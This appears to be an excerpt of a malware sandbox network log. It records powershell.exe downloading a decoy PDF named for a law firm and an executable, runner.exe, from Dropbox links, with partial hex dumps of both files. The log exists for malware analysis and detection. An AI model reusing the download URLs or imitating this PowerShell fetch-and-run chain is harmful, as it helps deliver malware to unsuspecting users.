                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: 510f9ca44cd64d27a390f7a1263a812a
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:40 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      15192.168.2.749794162.125.69.154437976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:42 UTC370OUTGET /cd/0/get/CgC-FVFNHj6mqbOCsWuKDQilGp00CAeDNPmt-bZ3x8XPmIdM1Gff0PUUzgtHwNFtYvOTBVQLaPsAbb8LxWMDvSMfhwxywu7khFBduFrJ0cm3W5965j-gmYhSIWCGqvXZlz9A27yw1_Kt1KWTsiDmfIgs/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:43 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      Etag: 1733686441286063d
                                                                                                                                                                                                                                                                                                      Pragma: public
                                                                                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Server-Response-Time: 293
                                                                                                                                                                                                                                                                                                      X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:43 GMT
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      Content-Length: 106848
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: b5695c0bdaca4009b8f89294aab25286
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:43 UTC15623INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                                      Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:43 UTC16384INData Raw: 6f b3 05 3c fc 9b b7 28 fc 39 03 da b8 cf 07 d8 da eb fe 02 d3 6f 21 b6 84 6a 9a 74 98 8e 55 01 58 bc 6d 90 09 f4 65 c0 39 f5 ae a6 c3 52 46 f1 be a9 a6 8d bc 5b c3 31 1b b9 dd c8 3c 67 d3 6f 6a d6 12 bd 9b ea 79 98 8a 5e cd ca 9c 2f ee dd 3f 93 df f1 3c f7 e3 3e 96 23 d4 2c 35 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: o<(9o!jtUXme9RF[1<gojy^/?<>#,5E2`f0T~U|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:43 UTC761INData Raw: cd 31 4a 9c ec 77 4a 46 46 6a 42 cc 0a e5 e7 a9 2b 28 81 25 6c b0 f6 df ea 58 7a 55 9a db 7d 7a fe d9 d3 91 10 f4 c5 e1 ac a7 44 0e 97 9b ad 9a df f7 a5 f4 6a eb a3 14 e7 d5 f7 93 51 18 91 f1 42 81 8c 81 18 74 41 0c 1c 17 06 84 7b 47 a5 f0 d1 c3 dc 63 92 c6 f4 36 16 a5 14 e6 e6 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: 1JwJFFjB+(%lXzU}zDjQBtA{Gc6gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu|n:27wUW:Jj+bo
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:44 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                                      Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:44 UTC16075INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                                      Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:44 UTC309INData Raw: 55 6d 06 74 86 50 bd 0c be b2 f5 d3 db ba 43 c6 fc e0 b0 c3 96 ab 74 a5 7c c1 44 82 e2 ba 46 b7 f6 1f b6 d6 fc fa 68 b6 98 f2 71 c9 72 29 63 61 a3 4e f7 ca 58 6d ba e2 a5 ab 9f b8 9e cb 59 45 8f dc 9f c0 a3 b9 c1 94 53 f0 cb 3d 3d 15 47 f7 78 c6 ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5 10 3a 6e 8b 76 49 5f b8 dc 10 46 aa 1e 21 7e 2f ea ad ae 00 c3 f5 8d 8c
                                                                                                                                                                                                                                                                                                      Data Ascii: UmtPCt|DFhqr)caNXmYES==Gx6R#90iq0l/}VA\N'Ff|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A:nvI_F!~/
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:44 UTC16384INData Raw: c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e 3d 78 f3 0f 4f 4d 85 ac 94 49 8f 6b ac 41 1f 92 52 2f 94 d2 4d 10 5b 7e ac 88 ed 68 72 27 d2 a0 96 06 d5 d4 23 29 bc 16 05 0f 19 c1 08 09 86 09 30 84 03 2d a2 4b c0 96 08 26 1e 4b 3c 9d d0 24 12 ae b2 9f 2e 8a 2e 5e 90 68 de 4a 15 65 c9 c7 63 cb 41 06 e4 f9 f7 d5 71 83 33 f3 4b 19 8a 85 b0 01 e1 68 79 d8 0f 54 2a 68 da 20 82 d5 b8 e3 f1 f7 1e 1b b6 25 46 ca bd 77 1c bd b3 a1 6c 49 75 05 4c 36 a1 1c 01 35 4a 4c ca 6e df f4 cc 96 95 f2 c0 ad 4f 6f b1 c6 62 12 45 5c 58 75 ff 37 67 22 3b f6 ed 4e 40 d1 d6 88 96 60 21 82 1f 4d 77 05 8d c2 a5 9b 08 bd 96 b0 46 1a db 1e dc b0 ef 99 23 75 40 10 00 a2 a2 04 65 6a 2f 6c 77 11 bb a1 59 8e 48 a2 d5 6a a7 69 11 ad 7c 12 14 81 28 a6 cb
                                                                                                                                                                                                                                                                                                      Data Ascii: =kDc)Vc=xOMIkAR/M[~hr'#)0-K&K<$..^hJecAq3KhyT*h %FwlIuL65JLnOobE\Xu7g";N@`!MwF#u@ej/lwYHji|(
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:44 UTC16384INData Raw: 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c d4 aa a9 5b 54 db dc fc 4a 9a 91 b1 a6 32 c6 d4 cc ba 95 2d de dd cd 6f 0e 60 ec e6 cd 8c e9 1f 9a d7 3c 7f d1 fa 77 d5 41 8c 2d a9 67 cc 16 98 df 74 fa bc d7 ca 77 14 32 b6 6d 14 63 f6 0f 1a 1b 6a eb 3b 0f df f3 1a da b3 a2 bd 81 8d 70 d8 ee 49 3f 88 34 da 63 59 8d 8b 5a 56 0f 1b 63 3c 84 f4 47 8c 2d 9c d9 b4 a4 ae b6 ed c8 a6 53 18 db d5 9b b1 41 86 45 b5 ab 9b f3 17 65 ff 09 f9 8d 28 ef 5d d4 d0 52 7b ed d9 5b 57 32 de 7d 2f d2 e7 2c ae 5d d4 e0 8a bf 70 05 63 9f e1 99 7d 5a 9a 97 2c 6f e9 72 b3 8d 18 cf 9d a2 7c f3 b2 86 e6 db 7f 58 f0 08 63 6b 2f c6 e3 be 67 62 2e 0c 23 2e 5a 18 77 f5 b7 73 ec 43 bf 66 a9 26 26 ec c1 4f d6 3e 27 f8 9d ef 6e 7d f2 87 43 47 5a e3 3e 35
                                                                                                                                                                                                                                                                                                      Data Ascii: 'G+x)}&N-wcu#<[TJ2-o`<wA-gtw2mcj;pI?4cYZVc<G-SAEe(]R{[W2}/,]pc}Z,or|Xck/gb.#.ZwsCf&&O>'n}CGZ>5
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:44 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      16192.168.2.749816162.125.69.184437976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:46 UTC212OUTGET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:47 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: img-src https://* data: blob: ; font-src https://* data: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https:// [TRUNCATED]
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Location: https://ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com/cd/0/get/CgBXr9toUXs-m3mhJIMBILhUZM6kIqyZ-YXP6mPRPYoNEJlTTyTrrqFUDwDxcBR6zyCWH374VEAZBXmMLPRhA0UAObkL1JGp1CBYzkG8jZxF3jQN8zo1HYxFMKGc8L1zhl2bVNIEcZ8JNNk8CQawjHet/file?dl=1#
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                      Set-Cookie: gvc=NzMyNTM0Nzc2Njg1NTkwNDEyNzUwNTc4NTk4MDMyMDY4MTA3OTM=; Path=/; Expires=Sun, 09 Dec 2029 17:41:47 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: t=4bUcc9ZpXCCYAIHOJUcS0zDz; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:47 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-js_csrf=4bUcc9ZpXCCYAIHOJUcS0zDz; Path=/; Expires=Wed, 10 Dec 2025 17:41:47 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: __Host-ss=Q52SVxthKQ; Path=/; Expires=Wed, 10 Dec 2025 17:41:47 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                      Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:47 GMT
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Content-Length: 17
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:47 GMT
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: d31770136b404ac2a0e37dccbeab0d34
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:47 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      17192.168.2.749830162.125.65.154437976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:49 UTC370OUTGET /cd/0/get/CgBXr9toUXs-m3mhJIMBILhUZM6kIqyZ-YXP6mPRPYoNEJlTTyTrrqFUDwDxcBR6zyCWH374VEAZBXmMLPRhA0UAObkL1JGp1CBYzkG8jZxF3jQN8zo1HYxFMKGc8L1zhl2bVNIEcZ8JNNk8CQawjHet/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                      Host: ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      Etag: 1733720950943161d
                                                                                                                                                                                                                                                                                                      Pragma: public
                                                                                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                      X-Server-Response-Time: 303
                                                                                                                                                                                                                                                                                                      X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                      Date: Tue, 10 Dec 2024 17:41:50 GMT
                                                                                                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      Content-Length: 2764800
                                                                                                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                      X-Dropbox-Request-Id: 91c2333fe8e745009cb050fd66b50000
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC15646INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 8c c0 ee f9 ed ae bd f9 ed ae bd f9 ed ae bd 7a e5 f1 bd fe ed ae bd 03 ce b7 bd fb ed ae bd ea e5 f3 bd fb ed ae bd 7a e5 f3 bd ee ed ae bd f9 ed af bd 9b ec ae bd 23 ce b2 bd f8 ed ae bd fc e1 f1 bd f8 ed ae bd fc e1 ce bd 90 ec ae bd 15 e6 f0 bd f8 ed ae bd f9 ed ae bd f8 ed ae bd fc e1 f4 bd f8 ed ae bd 52 69 63 68 f9 ed ae bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zz#Rich
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC16384INData Raw: 89 4c 24 10 db 44 24 10 7d 06 dc 05 58 d6 53 00 dc 0d a8 d6 53 00 dd 5f 20 8b 4e 04 8b 06 03 c1 83 c1 04 89 4e 04 0f b6 50 01 33 c9 8a 68 03 8a 48 02 0f b6 00 c1 e1 08 0b ca c1 e1 08 0b c8 89 4c 24 10 db 44 24 10 dc 0d a8 d6 53 00 dd 5f 30 8b 4e 04 8b 06 03 c1 83 c1 04 89 4e 04 0f b6 50 01 33 c9 8a 68 03 8a 48 02 0f b6 00 c1 e1 08 0b ca c1 e1 08 0b c8 89 4c 24 10 db 44 24 10 dc 0d a8 d6 53 00 dd 5f 38 8b 4e 04 8b 06 03 c1 83 c1 02 89 4e 04 33 c9 8a 68 01 8a 08 89 4f 2c 8b ce e8 0d 07 08 00 8b ce e8 96 08 08 00 85 c0 0f 95 c2 8b ce 88 57 40 e8 87 08 08 00 85 c0 0f 95 c0 8b ce 88 47 41 e8 78 08 08 00 85 c0 0f 95 c1 88 4f 42 6a 05 8b ce 88 5f 43 88 5f 44 e8 11 07 08 00 8b ce 89 47 28 e8 d7 06 08 00 8b c7 5f 5e 5d 5b 59 c2 04 00 cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                      Data Ascii: L$D$}XSS_ NNP3hHL$D$S_0NNP3hHL$D$S_8NN3hO,W@GAxOBj_C_DG(_^][Y
                                                                                                                                                                                                                                                                                                      2024-12-10 17:41:50 UTC738INData Raw: 00 3b 44 24 54 0f 8d 7a 00 00 00 8b 44 24 14 8a 48 42 84 c9 74 55 8a 48 41 84 c9 75 4e 8b 0f 8b c1 c1 e8 18 3d ff 00 00 00 75 14 8b c5 c1 e8 18 50 55 51 e8 ba a7 ff ff 83 c4 0c 89 07 eb 4c 50 8b d5 c1 ea 18 52 55 51 e8 15 63 03 00 0d 00 00 00 ff 83 c4 04 50 e8 97 a7 ff ff 83 c4 0c 50 e8 6e 62 03 00 83 c4 08 89 07 eb 20 8b 84 24 08 01 00 00 0f b6 4c 07 03 51 55 e8 54 62 03 00 83 c4 08 89 07 eb 06 c7 07 00 00 00 00 8b 54 24 34 8b 44 24 5c 8b 4c 24 44 42 40 46 83 c7 04 3b c1 89 54 24 34 89 44 24 5c 0f 8c ba fe ff ff eb 0c 8b 4c 24 44 8b 7c 24 3c 33 c0 f3 ab 8b 54 24 48 8b 4c 24 18 8b 44 24 38 42 89 54 24 48 8b 54 24 20 03 ca 89 4c 24 18 8b 4c 24 3c 8d 14 81 8b 44 24 40 8b 4c 24 50 89 54 24 3c 8d 14 88 8b 84 24 dc 00 00 00 48 89 54 24 40 89 84 24 dc 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: ;D$TzD$HBtUHAuN=uPUQLPRUQcPPnb $LQUTbT$4D$\L$DB@F;T$4D$\L$D|$<3T$HL$D$8BT$HT$ L$L$<D$@L$PT$<$HT$@$
